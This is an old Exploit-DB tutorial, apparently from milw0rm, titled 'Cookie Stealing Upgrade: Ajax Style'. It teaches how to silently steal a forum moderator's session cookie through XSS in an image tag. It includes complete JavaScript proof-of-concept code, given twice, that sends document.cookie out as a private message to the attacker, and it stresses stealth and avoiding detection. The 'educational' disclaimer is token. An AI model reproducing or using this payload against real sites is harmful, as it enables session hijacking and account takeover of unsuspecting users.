- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13118
- Проверка EDB
-
- Пройдено
- Автор
- UNLIMITEDORB
- Тип уязвимости
- PAPERS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2006-12-31
Код:
~~~~Cookie Stealing Upgrade: Ajax Style~~~~
Author: AJP
Aim: unlimitedorb, MSN: [email protected]
Email: [email protected]
Proof of Concept Code is provided at the end.
12/30/2006
/* Preface */
*-----------------------*
* This tutorial *
* Will assume that you *
* Have an understanding *
* of cookie stealers in *
* general and want to *
* make your technique *
* much more silent *
* and effective through *
* the use of AJAX ie; *
* ABSOLUTELY NO *
* Page Refreshes Allowed*
/*************************/
Note: THIS IS INTENDED FOR EDUCATIONAL PURPOSES AND THE AUTHOR IS NOT RESPONSIBLE FOR WHAT THE GENERAL COMMUNITY USES THIS FOR.
__Introduction__
For those of you that have been living under a good and solid rock lately, AJAX is
revolutionizing the way the web works in the fact that it brings desktop-like functionality
straight to the web in the form of Javascript and XML (For this tutorial, a working knowledge
of XML is not needed.) In other words, AJAX (Asynchronous Javascript and XML) gets rid of pesky
page refreshes and coupled with DHTML effects, can lead to quite interesting desktop-like web
apps. AJAX is not 1 technology, but rather it's a collection of technologies that when used
together provide a powerful framework. This Article/Tutorial will attempt to teach you how to
harness this power to develop a very powerful cookie stealer. It's a great introduction to AJAX
as well since it uses it in a unique and fun way. Before you use this tutorial, you must
realize that AJAX is only useful specifically as a cookie stealer if it bypasses Cross-Domain
policies. In order for this to work, the target site must have some sort of private messaging
system in place to receive the cookies themselves. This will effectively bypass all
verification that the browser needs in order to send the request.
__Cookie Stealing with AJAX? What's the point!__
You may find yourself wondering how this could possibly help you generate a much more
stealthy cookie stealer. Well, if you still don't understand then i'll take a moment to
explain why and how this leads to the generation of a highly effective cookie stealer on
steroids. To begin with, the property that is much sought after with AJAX is its ability to
send arbitrary requests to a server in the form of an XMLHttpRequest. Essentially, it's
possible to send such requests through the use of hyptertext links and/or various submit
devices employed within web pages etc. But through the use of AJAX, once a user clicks on such
a link as described above, the request is automatically sent to the server for processing
without the need to redirect the user to another web page. This destroys the need for a page
refresh, and thus gives the end user the ultimate in web functionality. All this is possible
assuming that a web browser is augmented with a javascript interpreter of the right caliber
(Most web browsers in use nowadays have this capability.) So now let's think for a moment and
apply what we just learned to Cookie Stealing. A great majority of cookie stealers utilize
javascript's Location method e.g; window.document.location="http://www.cookiestealer.com/
crappystealer.php". This will upon execution redirect the end user to a different page entirely
than what was requested. Go ahead and try it out using javascript urls (or inline javascript if
you rather) javascript: window.document.location="http://www.siteiwanttoberedirectedto.com";
This is the OLD way of cookie stealing, this article will get you up to date on how to redirect
the end user to the web page of your choice (in this case a cookie stealer) through the
employment of AJAX. Sometimes attackers will get creative with their cookie stealer (The OLD
type) and make the page look exactly as the page that was previously requested. But guess what?
Many users nowadays get suspicious when they see a web url that's not the domain they started
with and on top of that looks something rather similar to http://pwnyougood.com/
stealstuff.php. Once they see this, chances are the incident will be reported and the web
administration team/individual will realize the heist for what it is and patch the problem (In
a perfect world of course ;) Using AJAX, you can append the users cookies to a silent request
and send it wherever your heart desires (There can be some penalties with this, but we will
discuss what they are and how to work around them later on.) Final result: user visits
something like a forum...and that's it, mission accomplished and cookie is stolen. Nothing
seems to happen, at least on the surface ;)
__I'm hooked, Now how do I get started?__
After such a long winded introduction it's now time to get to the code itself and jump in
head first. For our purposes we will make AJAX compatible with the 2 major browsers (At the
time of this writing) Mozilla and Microsoft Internet Explorer. You will need some sort of Http
Debugger, Paros Proxy or Microsoft Fiddler will suffice. This will be used to track requests
later on, it is not required but highly useful.
IMPORTANT NOTE: This tutorial will utilize a common vector of attack (Cross Site Scripting)
for Proof of Concept code, We will be manipulating the SRC attribute of the <img> tag in HTML
to do our dirty work. The underlying code foundation can be easily modified to suit your needs
provided you have a basic understanding of coding. The full code including a basic cookie
stealer will be provided at the end of the tutorial.
__Tomorrow Never Dies__
//Begin of Sneaky Background Music
Your Mission: Infiltrate a poorly made php-driven web forum that does not filter image
signatures for javascript or other malicious code. Obtain a Moderators cookie without him/her
or anyone knowing it was taken, and report back to base. I grant you permission to pick up hot
ladies on the way ;)
//End of Sneaky Background Music
Let us kick start our journey by using a harmless image tag to house our javascript urls in
the SRC (A common form of XSS.)
<img src="javascript:
//We will set XMLHttpRequestObject false to see if it returns true later on.
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
The above code is a simple test to confirm that an XMLHttpRequest Object can be generated.
If not, the code will return false and an alert will popup saying that javascript must be
enabled before continuing. Now that we have succesfully generated our new Object, it is time to
create a function that will send a request to the server upon the body itself successfully
loading. But we have a problem here...When AJAX tries to access a foreign site. Usually, the
browser will protest with a confirmation message on whether or not the user wants to allow
this access...well that defeats the purpose! We need to get rid of this protest if we want to
make sure that our code is silent and deadly. Luckily, our mission was to do this for a forum,
and usually forums will have some sort of private messaging system in place. So let's use the
site against itself and send our cookies in the form of a message. Not only will this save us
the hassle of making a file in php to retrieve the cookies and open a file to write them to,
but it will also allow easy access and free storage and to ice the cake, we have also bypassed
restrictions placed on accessing foreign sites. Now who can argue with that? =)
function socket()
{
/*The line below is very important. Notice that the Cookie is appended as a concentenated
string? If the site is using a POST method to send messages then you will have to modify the
code as well as fire up your HTTP debugger to make the necessary modifications.*/
XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php user=yourusername&subject=' + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
//Out of the Goodness of our heart =p
delete XMLHttpRequestObject;
}
//Don't forget this is an image and close the image tag!
window.document.onload='socket();'">
__Conclusion__
Well there you have it folks, a simple yet extremely effective form of Cookie Stealing
utilizing AJAX. The code provided is only an example and is in no way meant to be a one size
fits all type thing. For instance, what if the private messaging system used POST instead of
GET, or what if you really wanted to use an image and not have it broken? This tutorial should
get you started on developing your devilishly silent scripts. So all in all you should at least
be familiar with the concept of stealing cookies without page refreshes and how great a risk
this imposes upon poorly secured websites. This is extremely hard to track if implemented in
the right way. I hope you enjoyed this tutorial as much as I did in writing it and I also hope
I achieved my intention of explaining without spoon-feeding. I hope this isn't a crutch, but
at the same time I hope it helps you in whatever journey you ultimately choose. An interesting
story that deals with how a person coupled Cross Site Scripting with Cross Site Request Forgery
to carry out his attacks is the samy worm story. If you take a look at the original code used
in the story you should be able to see that the code utilized AJAX to execute.
__Proof of Concept__
<img src="javascript:
//We will set XMLHttpRequestObject false to see if it returns true later on.
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
function socket()
{
//The line below is very important. Notice that the Cookie is appended as a concentenated
string?
XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php?
user=yourusername&subject=' + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
//Out of the Goodness of our heart =p
delete XMLHttpRequestObject;
}
//Don't forget this is an image and close the image tag!
window.document.onload='socket();'">
__Afterthought__
One thing that tends to make every fiber of my being seethe with anger is labels. To label a
person is to label how someone lives. How they wake up each day and go to bed every single
night. In the act of labeling you are weakening an entity, making sure that no matter how hard
it tries, it will never be anything more than what it already is. Please don't label people or
what they stand for...Even if you laugh at my advice and consider it ridiculous, then I
honestly hope the one thing you don't ever label is...yourself.
~AJP (Peace. Out.)
# milw0rm.com [2006-12-31]
- Источник
- www.exploit-db.com